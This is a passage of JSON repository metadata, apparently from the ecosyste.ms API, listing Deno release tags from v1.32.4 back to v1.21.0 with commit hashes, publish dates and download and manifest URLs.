Hub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"2